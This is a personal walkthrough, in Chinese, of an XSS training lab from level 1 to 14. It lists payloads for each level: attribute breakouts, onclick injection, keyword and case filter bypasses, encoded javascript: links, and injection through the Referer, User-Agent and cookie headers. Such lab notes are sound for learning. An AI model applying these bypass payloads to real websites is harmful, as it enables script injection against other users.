1
| <script " 'Oonn> 可以用来测闭合
|
level 1
将上面的test改为
1
| <script>alert(1)</script>
|
level 2
检测搜索框内为双引号闭合
1
| "><script>alert(1)</script>
|
level 3
“>”被替换了
1
| keyword=1' onclick='alert(1) 补全标签
|
level 4
查看源码如下
1
| <input name="keyword" value="script " 'oonn"="">
|
双引号闭合
1
| keyword=1" onclick="alert(1) 补全标签
|
level 5
关键词过滤
1
| <input name="keyword" value="<scr_ipt " 'oo_nn="">
|
1
| keyword="><a href="javascript:alert(1)"
|
点一下下面的蓝色连接即可
level 6
在上一题基础上有了更多过滤
1
| <a hr_ef="javascript:alert(1)" "="">
|
1
| keyword="><a hRef="javascript:alert(1)"
|
?上一题过滤大小写这题不过滤?
level 7
似乎删掉了关键字
1
| <input name="keyword" value="< " 'on="">
|
onclick删了on,过滤了但没完全过滤(
1
| keyword=1" oonnclick="alert(1)
|
level 8
应该还是关键词过滤
1
| <a href="<scr_ipt " 'oo_nn>">友情链接</a>
|
大小写绕过无效,自动转换为小写
可以编码绕过
1 2
| javascript:alert(1) 以上字符串对javascript:alert进行ascii编码
|
level 9
1 2 3 4
| <input name="keyword" value="<script " 'oonn>"> <input type="submit" name="submit" value="添加友情链接">
<a href="您的链接不合法?有没有!">友情链接</a>
|
?不太对劲,百度下源码
要加个http://,剩下与第8题一样
只要有这个字段就行
1 2
| javascript:alert(1)('http://') 刚开始还不知道拿这个http咋办,结果百度只要扔在后面就行
|
level 10
随便扔个关键字进去没反应
F12
1 2 3
| <input name="t_link" value="" type="hidden"> <input name="t_history" value="" type="hidden"> <input name="t_sort" value="" type="hidden">
|
url里的keyword估计啥用没有,再扔几下
1
| <input name="t_sort" value="script " 'oonn"="" type="hidden">
|
1
| t_sort=" onclick='alert(1)' type="text
|
关键应该就是type把hidden改掉
level 11
把上一题payload扔进去
1
| <input name="t_sort" value="" onclick='alert(1)' type="text" type="hidden">
|
试了半天都差不多这样,麻
查了源码是referer请求头注入
题目好像有提示我傻了
把上一题的payload扔到referer里就行
level 12
又是请求头
1
| <input name="t_ua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" type="hidden">
|
?服务器拒绝连接太6了
跳了不知道什么情况
level 13
这题改cookie
1
| <input name="t_cook" value="" type="hidden">
|
emm还要添个user
1
| user=" onclick='alert(1)' type="text
|
level 14 (写不出来)
需要用到这个网站:http://ww1.exifviewer.org/ 需要梯子
查了下解法:
1.查看源码是iframe框,src到上面的网站
2.burp抓包请求,返回有字段X-Frame-Options:SAMEORIGIN(我抓了,没有,可能是我的问题),表示该页面要在相同域名的iframe中展示,修改为:X-Frame-Options:ALLOW-FROM http://…/xss/level14.php
3.这个网站可以从任意图像文件提取元数据,往文件写入xss payload
4.使用火狐firebug将scrolling=”no”改为yes会出现滚动条
5.win7修改图片属性可直接修改EXIF的值
6.payload:
1
| '"><img src=1 onerror=alert(document.domain)>'
|
在上传过程不断修改返回包的X-Frame-Options字段
比前面的有趣,虽然我肯定不会写
level 15
…
后面都404了
先这样了